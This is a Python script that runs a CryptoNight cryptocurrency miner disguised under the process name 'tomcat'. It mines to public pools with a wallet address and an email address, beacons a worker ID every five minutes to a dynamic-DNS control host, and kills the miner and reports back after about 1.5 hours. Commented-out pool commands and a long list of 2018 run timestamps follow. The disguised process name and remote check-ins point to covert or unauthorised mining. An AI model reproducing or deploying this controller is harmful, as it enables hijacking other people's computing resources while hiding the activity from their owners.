import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:23:06.356824
#2018-02-17 17:11:06.057959
#2018-02-17 18:59:06.763322
#2018-02-17 20:47:05.365809
#2018-02-17 22:34:06.054068
#2018-02-18 00:17:07.406272
#2018-02-18 02:08:02.211090
#2018-02-18 03:55:07.024625
#2018-02-18 05:42:05.291402
#2018-02-18 07:34:04.808047
#2018-02-18 09:22:01.691672
#2018-02-18 11:08:01.197795
#2018-02-18 12:55:05.362953
#2018-02-18 14:42:06.509909
#2018-02-18 16:31:05.725409
#2018-02-18 18:20:06.106435
#2018-02-18 20:07:06.318607
#2018-02-18 21:54:04.769504
#2018-02-18 23:42:04.498930
#2018-02-19 01:28:04.854839
#2018-02-19 03:16:07.941146
#2018-02-19 05:01:02.147859
#2018-02-19 06:45:07.174767
#2018-02-19 08:36:01.479930
#2018-02-19 10:25:08.821036
#2018-02-19 12:13:04.110057
#2018-02-19 14:00:02.975157
#2018-02-19 15:48:10.843151
#2018-02-19 17:37:07.527055
#2018-02-19 19:27:05.618578
#2018-02-19 21:13:04.407637
#2018-02-19 22:59:06.056085
#2018-02-20 00:43:01.422953
#2018-02-20 02:33:04.701226
#2018-02-20 04:22:07.424904
#2018-02-20 06:06:06.684863
#2018-02-20 07:51:04.162551
#2018-02-20 09:37:06.723093
#2018-02-20 11:20:08.306611
#2018-02-20 13:07:04.520740
#2018-02-20 14:50:10.609912
#2018-02-20 16:36:01.338242
#2018-02-20 18:23:08.839267
#2018-02-20 20:14:05.718117
#2018-02-20 22:00:11.303353
#2018-02-20 23:40:09.113903
#2018-02-21 01:24:07.973848
#2018-02-21 03:13:07.687548
#2018-02-21 05:01:06.988497
#2018-02-21 06:49:01.476354
#2018-02-21 08:34:08.765224
#2018-02-21 10:20:01.887796
#2018-02-21 12:07:08.741877
#2018-02-21 13:55:10.956256
#2018-02-21 15:39:07.995056
#2018-02-21 17:29:10.822486
#2018-02-21 19:16:08.776654
#2018-02-21 21:03:06.853536
#2018-02-21 22:49:07.504661
#2018-02-22 00:38:06.261429
#2018-02-22 02:25:06.639131
#2018-02-22 04:12:07.840757
#2018-02-22 05:56:07.673548
#2018-02-22 07:42:06.912226
#2018-02-22 09:31:06.358780
#2018-02-22 11:17:05.920235
#2018-02-22 13:02:02.074864
#2018-02-22 14:51:08.341989
#2018-02-22 16:38:02.204061
#2018-02-22 18:23:05.130569
#2018-02-22 20:17:08.029764
#2018-02-22 22:03:02.185693
#2018-02-22 23:49:09.289438
#2018-02-23 01:38:06.228057
#2018-02-23 03:24:06.755870
#2018-02-23 05:11:04.940156
#2018-02-23 06:56:02.068215
#2018-02-23 08:45:04.266942
#2018-02-23 11:01:04.257149
#2018-02-23 12:56:07.946365
#2018-02-23 14:39:07.762629
#2018-02-23 16:29:02.043360
#2018-02-23 18:15:08.827341
#2018-02-23 20:02:07.500671
#2018-02-23 21:47:01.635036
#2018-02-23 23:41:05.576338
#2018-02-24 01:29:07.311339
#2018-02-24 03:19:06.382717
#2018-02-24 05:04:07.437817
#2018-02-24 06:54:04.267981
#2018-02-24 08:46:01.470835
#2018-02-24 10:48:01.725506
#2018-02-24 12:35:06.651278
#2018-02-24 14:24:06.908840
#2018-02-24 16:12:05.601312
#2018-02-24 18:04:05.025619
#2018-02-24 19:51:04.205286
#2018-02-24 21:36:04.505027
#2018-02-25 01:56:03.535454
#2018-02-25 05:44:06.264324
#2018-02-25 11:37:05.709620